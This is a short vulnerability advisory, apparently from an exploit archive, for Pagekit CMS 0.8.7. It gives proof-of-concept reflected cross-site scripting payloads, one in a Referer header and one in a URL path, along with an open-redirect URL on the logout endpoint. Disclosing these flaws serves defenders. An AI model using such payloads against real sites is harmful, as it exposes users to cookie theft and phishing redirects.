Pagekit 0.8.7 Cross Site Scripting / Open Redirect

`# Exploit Title: Pagekit 0.8.7 Multiple Vulnerabilities  
# Date: 13-10-2014  
# Remote: Yes  
# Exploit Author: Mahendra  
# Vendor Homepage: http://www.pagekit.com/  
# Version: 0.8.7  
# Tested on: Windows XP SP 3 with WAMP Server 2.4  
  
The latest Pagekit (0.8.7) CMS was found to be vulnerable with multiple reflected cross-site scripting because the application did not properly validate user input.  
  
Pagekit is a modular and lightweight CMS built from the ground up with modern technologies like Symfony components and Doctrine. It will have a build-in marketplace to provide an awesome platform for theme and extension developers. Pagekit will be MIT licensed and hosted on GitHub.  
  
-------------------------------------------------------------------  
Reflected cross-site scripting (CVE-2014-8069)  
-------------------------------------------------------------------  
  
Referer HTTP Header  
--------------------  
  
GET /pagekit-0.8.7/index.php/user HTTP/1.1  
Host: localhost  
Referer: <ScRiPt>alert(document.cookie)</ScRiPt>  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: pagekit_session=unl3outg9eufv7fs7juq1ui1m6  
Connection: keep-alive  
Cache-Control: max-age=0  
  
  
Arbitrary URL  
--------------------  
The application will encode the URL entered by the user below. However, this can be easily bypassed with proxy and modify the URL back to original state.  
  
http://localhost/pagekit-0.8.7/index.php/1<ScRiPt>alert(document.cookie)</ScRiPt>  
  
-------------------------------------------------------------------  
Open redirection (CVE-2014-8070)  
-------------------------------------------------------------------  
  
http://localhost/pagekit-0.8.7/index.php/user/logout?redirect=http://www.google.com  
`